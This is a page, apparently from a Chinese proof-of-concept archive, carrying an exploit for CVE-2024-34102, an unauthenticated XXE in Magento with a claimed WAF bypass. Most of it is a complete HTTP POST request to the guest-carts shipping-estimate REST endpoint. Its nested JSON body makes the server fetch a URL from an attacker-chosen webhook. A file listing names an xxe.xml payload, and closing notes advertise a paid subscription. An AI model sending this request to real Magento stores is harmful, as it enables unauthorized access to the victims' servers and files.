关联漏洞
介绍
# CVE-2024-34102
POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook
```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
{
"address": {
"totalsCollector": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "http://YOUR-webhook",
"dataIsURL": true,
"options": 1337
}
}
}
}
}
}
```
文件快照
[4.0K] /data/pocs/549a8b7f633d11bf575c49f6e3afdbcec39addcd
├── [ 725] README.md
└── [ 151] xxe.xml
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →